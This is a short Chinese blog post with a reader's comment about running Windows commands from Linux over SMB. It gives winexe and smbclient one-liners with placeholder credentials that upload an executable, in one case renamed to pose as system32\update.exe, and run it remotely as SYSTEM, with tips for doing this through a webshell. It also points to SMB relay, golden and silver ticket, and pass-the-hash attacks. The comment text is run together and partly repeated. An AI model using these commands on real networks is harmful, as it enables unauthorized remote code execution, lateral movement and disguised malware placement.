Linux下smb 挂载执行Windows下命令

Winexe smbclient mount思想碰撞了今天,20150428;头脑风暴.

winexe -U Administrator%Password --uninstall --system //10.10.0.6 cmd.exe

winexe可以自己编译好丢上去.(Winexe Python 版本 https://github.com/jakobadam/python-winexe) smbclient有个put上传啊，help一下所有命令smb:\>put /root/Desktop/enc.exe \windows\system32\update.exe执行就用winexewinexe -U domain/user%pass //ip c:\\windows\\system\\update.exes!lly3r|smbclient //IP/patch -U user%pass -c "put x.exe"webshell都可以操作 不需要交互的shell域的机器记得加 -W 指定域 不然可能登录失败bingfeng成功:smbclient -c 'cd temp;put /tmp/1.exe 1.exe;ls' //ip/c$ -U user%pass在shell 里面必须用单引号 不然分号会截断本身system 执行的命令

^_^一直关注博主你学习到不是姿势,thx你.博主木有Linux下跨Windows的一些招式么?如:Winexe smbclient mount额 mount需要root权限才能运行;但是winexe本地编译好丢上去即可;smbclient自带就最好了.(Winexe Python 版本 https://github.com/jakobadam/python-winexe) smbclient //IP/patch -U user%pass -c "put x.exe"webshell都可以操作 不需要交互的shell域的机器记得加 -W 指定域 不然可能登录失败执行就用winexewinexe -U domain/user%pass //ip c:\\windows\\system\\x.exe或者smbclient //IP/patch -U user%pass -c "start x.exe"smbclient -c 'cd temp;put /tmp/1.exe 1.exe;ls' //ip/c$ -U user%pass在shell 里面必须用单引号 不然分号会截断本身system 执行的命令或者Linux下C或者python 扫描ipc smb的实用脚本.(impacket? pysmb? 我都弄不出使用脚本,可能我太菜了....)网上有个smbsync.py.smb协议重定向攻击(http://blog.cylance.com/redirect-to-smb) (MS15出了个洞就说这个命令执行的.)SpiderLabs(SMB嗅探) (https://www.trustwave.com/Resources/SpiderLabs-Blog/Top-Five-Ways-SpiderLabs-Got-Domain-Admin-on-Your-Internal-Network/)Windows票据 黄金票据 白银票据等等这些,Kerberos ticket TGT TGS .... (HASH注入验证也可以..)远控就是硬功夫了...差不多就这些......我邮箱是我QQ,希望能和博主一起交流交流.